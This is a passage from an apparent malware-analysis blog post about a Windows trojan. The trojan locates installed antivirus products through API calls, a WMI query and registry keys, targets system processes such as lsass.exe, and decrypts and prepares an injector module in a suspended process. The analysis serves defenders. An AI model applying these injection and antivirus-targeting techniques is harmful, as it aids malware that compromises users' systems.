<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">First is by using GetModuleFileNameExW found in psapi.dll with GetFileVersionInfoW and VerQueryValueW in version.dll. GetModuleFileNameExW returns the complete file path of the targeted file.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 13mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rwMT72s5fm5ilR8AlKlFkMmuTX9BU1PHdrw7Pitl_Brov_lfb5hxqRxdlHgHFHkMVziizS6yEni3wa4lB0R_FxoGqcAbqjzHs8Zv8PFJ6XuOhDHY0Le8f2aBK5KvH2Bwx6Iit3Fy/s1600/GetModuleFileNameExW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="89" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rwMT72s5fm5ilR8AlKlFkMmuTX9BU1PHdrw7Pitl_Brov_lfb5hxqRxdlHgHFHkMVziizS6yEni3wa4lB0R_FxoGqcAbqjzHs8Zv8PFJ6XuOhDHY0Le8f2aBK5KvH2Bwx6Iit3Fy/s320/GetModuleFileNameExW.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 11a: Using GetModuleFileNameExW to extract the complete file path of the matched running process.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> Second is by using WMI querying technique with the format "SELECT ExecutablePath FROM Win32_Process WHERE ProcessID = %u". WMI also known as Windows Management Instrumentation is a core Windows management technology. WMI can give administrators a means to extract information about the operating system; can start a process on remote computer; and many more. More information on WMI can be found in</span></span> <a href="http://technet.microsoft.com/en-us/library/ee692772.aspx"><span style="color: blue; font-family: Calibri;"><span style="font-size: 11pt;"><u>http://technet.microsoft.com/en-us/library/ee692772.aspx</u></span></span></a><span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9W684RofNL3c6NUdMekcyhMD3rfubM1W9Tef7V0WFr8zkwtc3WAzQluaRlj8-FrbFcimlmFBxNYXQ7Djwa9b5fSIR18wb-7o8Pbo2HnHskWJa9No5Jq6P4IPK3giU_VEkY6sF-tCw/s1600/WMI_Query.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9W684RofNL3c6NUdMekcyhMD3rfubM1W9Tef7V0WFr8zkwtc3WAzQluaRlj8-FrbFcimlmFBxNYXQ7Djwa9b5fSIR18wb-7o8Pbo2HnHskWJa9No5Jq6P4IPK3giU_VEkY6sF-tCw/s320/WMI_Query.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 11b: Using WMI Query such as "SELECT ExecutablePath FROM Win32_Process WHERE ProcessID = %u"</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> Or third is by querying the installation path in registry pertinent to the matched executable process. The problem with this routine is that it can only support avp.exe (Kaspersky), Mcshield.exe (MacAfee) and tmproxy.exe (Trend Micro). The specified registry entries can be any of the following:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP80\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP11\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP10\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP9\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP8\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP7\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\kasperskylab\avp7\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\kasperskylab\avp6\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\McAfee\VSCore</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\TrendMicro\NSC\TmProxy</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\Rising\RIS</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\Rising\RAV</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqUgtAPWOXhVSsQjxlNRmODDaZ1hBW4PJpDiDgKjWN-Q3KqaPbMtWX4jSa8334Y-zdu8khe57KhvyyG0ZXhgaPkI2x4Xw6IirTj4b6cnEkoBvhLQFO_b8XiF23MwfC2uDIoERQOwsQ/s1600/reg_entries.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqUgtAPWOXhVSsQjxlNRmODDaZ1hBW4PJpDiDgKjWN-Q3KqaPbMtWX4jSa8334Y-zdu8khe57KhvyyG0ZXhgaPkI2x4Xw6IirTj4b6cnEkoBvhLQFO_b8XiF23MwfC2uDIoERQOwsQ/s320/reg_entries.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 11c: Using registry entries to determine the installation path.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> Now if there are no security softwares installed or running in process, the malware will default to of any of the following files:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">For 32bit operating system:</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\system32\lsass.exe</span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\system32\winlogon.exe</span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\system32\svchost.exe</span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">For 64bit operating system:</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\syswow64\lsass.exe</span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\syswow64\winlogon.exe</span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\syswow64\svchost.exe</span></div>
</li>
</ul>
</div>
</li>
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The executable verifies the image of the targeted file if it is Intel 386(32bit) or AMD 64(64bit). What’s interesting is that although the malware author may seem to check for 64bit systems, its procedure is actually empty and returns a NULL. It’s as if there is a plan to support 64bit but forgot to implement it.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0SGIgF2NhzsUenvJq-SXJCm3XpHsu7K9QKkZDdF8xnoixTEtKaya5Xs8DRQjfEQk7lTP371ARRxeIMzduBfFMkqWrUok8TkygKRzQGSrWOIJ25tx2iaLy2HpggSD5SgU3jlficntY/s1600/64bit_support_plan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0SGIgF2NhzsUenvJq-SXJCm3XpHsu7K9QKkZDdF8xnoixTEtKaya5Xs8DRQjfEQk7lTP371ARRxeIMzduBfFMkqWrUok8TkygKRzQGSrWOIJ25tx2iaLy2HpggSD5SgU3jlficntY/s320/64bit_support_plan.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 12: 64-Bit support is planned but the procedure only returns NULL.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> It then creates a mutex name based on process ID of the targeted file and continues to decrypt once again another module file (with MD5 of f5ee03fed0133bb06d4cc52b0232fec0). This executable module file is detected by Vipre as Trojan.Win32.Generic!BT.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1SadI_Hxl3iXsk2AlyuS4wLuNK0_Va8oOyKJ8RZlRyjEp13Oa9kC4mgx7qfuE24aRxo3qu_iE7uQQtjQuFOgD_cXi0yMFhEwFfoliUKbskAF8zrYGENf-6hBBKyVJeoLu2LpkespZ/s1600/Mutex_name.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1SadI_Hxl3iXsk2AlyuS4wLuNK0_Va8oOyKJ8RZlRyjEp13Oa9kC4mgx7qfuE24aRxo3qu_iE7uQQtjQuFOgD_cXi0yMFhEwFfoliUKbskAF8zrYGENf-6hBBKyVJeoLu2LpkespZ/s320/Mutex_name.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 13a: Mutex name creation based on PID of target file.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> I have taken the liberty of inserting comments to its decryption routine for the interest of our readers.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinN0WHc4XlRf_MwXykQcInkrkWXp1zfaQOIrV41fj3WNFldcBzXuAIMYk_2vWTTMeAWYWwJcB-RPnQq9V64zY2qVqBEwpielMkC8y1wqAxZuRzUJ-Y6Wv6hoNAZKFISNG0kf4mbH7w/s1600/decrypt_injector_mod.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinN0WHc4XlRf_MwXykQcInkrkWXp1zfaQOIrV41fj3WNFldcBzXuAIMYk_2vWTTMeAWYWwJcB-RPnQq9V64zY2qVqBEwpielMkC8y1wqAxZuRzUJ-Y6Wv6hoNAZKFISNG0kf4mbH7w/s320/decrypt_injector_mod.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 13b: Decrypting the injector module.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The malware then spawns a suspended process of the targeted file in memory. If the file is running under a 64bit environment, it does nothing and proceeds to terminate itself.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMuM33FZGNtdtGF7vtgaTpLAjwxkBvc8SgFqIch0m_gQ_GhYAK8jiEsrPCxIIPhaF8SeL4pmbDuY5EHdamx72tdI_eg6FoOEDyZTPlTbS0-e9B3Pwv76LGAFmn8PlyRAboaXsYCwmF/s1600/process_create.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMuM33FZGNtdtGF7vtgaTpLAjwxkBvc8SgFqIch0m_gQ_GhYAK8jiEsrPCxIIPhaF8SeL4pmbDuY5EHdamx72tdI_eg6FoOEDyZTPlTbS0-e9B3Pwv76LGAFmn8PlyRAboaXsYCwmF/s320/process_create.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 14: A suspended, no-window, detached process was spawned in memory.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The malware then proceeds to read the first 0x1000 bytes of the targeted file into memory using ReadProcessMemory function in order to parse the PE header and save the targeted file’s entry point in stack.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJGOYI3NBrXwpgeT2OSTUm16yIrx9SW-iZ3cXeT-KdlYdIA6g6iQZxq5WLc_vuMgWk09CdQZoOT_PPbbc7N-Fm3yuwz1lQoOqb5_H5Y2Lt74R4dlXpeXDbMLzHMQMsS2yprDr-44th/s1600/readprocessmem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJGOYI3NBrXwpgeT2OSTUm16yIrx9SW-iZ3cXeT-KdlYdIA6g6iQZxq5WLc_vuMgWk09CdQZoOT_PPbbc7N-Fm3yuwz1lQoOqb5_H5Y2Lt74R4dlXpeXDbMLzHMQMsS2yprDr-44th/s320/readprocessmem.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 15: ReadProcessMemory in action, first 0x1000 bytes of targeted file is copied into memory.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<div style="font-family: Tahoma;">
<a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 